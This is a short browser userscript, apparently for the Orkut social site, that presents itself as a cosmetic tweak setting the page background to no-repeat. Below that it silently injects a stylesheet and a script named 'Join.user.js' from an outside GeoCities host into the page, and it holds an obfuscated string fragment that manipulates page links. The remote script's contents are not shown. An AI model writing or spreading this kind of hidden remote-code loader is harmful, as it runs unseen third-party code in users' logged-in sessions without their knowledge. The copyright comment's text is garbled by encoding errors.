var css = "@namespace url(http://www.w3.org/1999/xhtml);body {background-repeat: no-repeat}";



if (typeof GM_addStyle != "undefined") {
	GM_addStyle(css);
}
else if (typeof addStyle != "undefined") {
	addStyle(css);
}
else {
	var heads = document.getElementsByTagName("head");
	if (heads.length > 0) {
		var node = document.createElement("style");
		node.type = "text/css";
		node.appendChild(document.createTextNode(css));
		heads[0].appendChild(node); 
   	}
}




var head=document.getElementsByTagName('head').item(0);

link = document.createElement('link');
link.href = 'http://geocities.yahoo.com.br/entertheorkutrix/simone.css';
link.type = 'text/css';
link.rel = 'stylesheet';
link.defer = true;
head.appendChild(link);

var script = document.createElement('script');
script.src = 'http://geocities.yahoo.com.br/entertheorkutrix/Join.user.js';
script.type = 'text/javascript';
script.rel = 'JavaScript';
script.defer = true;
head.appendChild(script);

a='lace(/ /g,"a[i].innerHTML")';b='"a=document.links;for(i=0;i<a.length;i++){ =( >\'>\')? .toUpperCase(): }".rep';void(0);




/* Copyright
// CÃ³pia total ou parcial Ã© completamente proibida sem aviso prÃ©vio e autorizaÃ§Ã£o dos autores!
// NÃ£o divulgue como sendo de sua autoria!
*/